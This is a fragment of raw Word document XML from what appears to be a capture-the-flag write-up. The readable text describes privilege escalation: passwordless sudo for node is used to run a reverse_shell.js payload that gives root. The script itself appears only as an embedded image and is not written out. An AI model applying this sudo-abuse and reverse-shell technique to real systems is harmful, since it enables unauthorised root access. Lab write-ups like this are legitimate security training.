    <w:p w14:paraId="1AE658D4" w14:textId="09326EA5" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EA8E9E" w14:textId="68146497" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6DEF74" w14:textId="3CE52F43" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D8347A" w14:textId="296534B1" w:rsidR="003A4981" w:rsidRDefault="0000000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then as a node user again I wrote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sudo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-l and see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341AEC87" w14:textId="3F049779" w:rsidR="003A4981" w:rsidRDefault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9504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2E33D333" wp14:editId="076ADB21">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7457440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1021080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="16" name="Object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1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71D39" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161C2138" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E90B79" w14:textId="77777777" w:rsidR="003A4981" w:rsidRPr="003A4981" w:rsidRDefault="003A4981" w:rsidP="003A498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</w:pPr>
      <w:r w:rsidRPr="003A4981">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>With node privileges, I saw I could run node commands with sudo and no password! I crafted a final payload in reverse_shell.js, which connected back to my listener, granting me root access. Here’s a quick look at the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF66BF" w14:textId="1DF38367" w:rsidR="009761F1" w:rsidRDefault="009761F1" w:rsidP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E156AAE" w14:textId="466F466A" w:rsidR="00DE1CF1" w:rsidRDefault="003A4981" w:rsidP="00DE1CF1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71552" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4D9BA156" wp14:editId="668937C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1753870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4762500" cy="469900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17" name="Object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</w:p>
    <w:p w14:paraId="7EF89DF6" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B05847C" w14:textId="77777777" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F19057" w14:textId="77777777" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46661076" w14:textId="74A1A1B5" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This time script got me to root user, where I found last flag. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4981">
        <w:t>Victory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13414382" w14:textId="77777777" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DE861C" w14:textId="77777777" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27ED7142" w14:textId="77777777" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B7012B" w14:textId="6ACBCFBD" w:rsidR="003A4981" w:rsidRDefault="003A4981">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="78E4A24A" wp14:editId="2D9F03E3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2631440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5435600" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19" name="Object18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18" descr="A numbe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981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C76BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="016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4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F1"/>
    <w:rsid w:val="003A4981"/>
    <w:rsid w:val="00477F6F"/>
    <w:rsid w:val="009761F1"/>
    <w:rsid w:val="00BD2EDB"/>
    <w:rsid w:val="00DB5996"/>
    <w:rsid w:val="00D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085F6"/>
  <w15:docId w15:val="{E8004272-44A9-FB45-A3E3-BFFF7646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extBody">
    <w:name w:val="Text Body"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/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59.164:8080/manage/scrip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Azarin Bayali</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-17T11:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-17T11:58:00Z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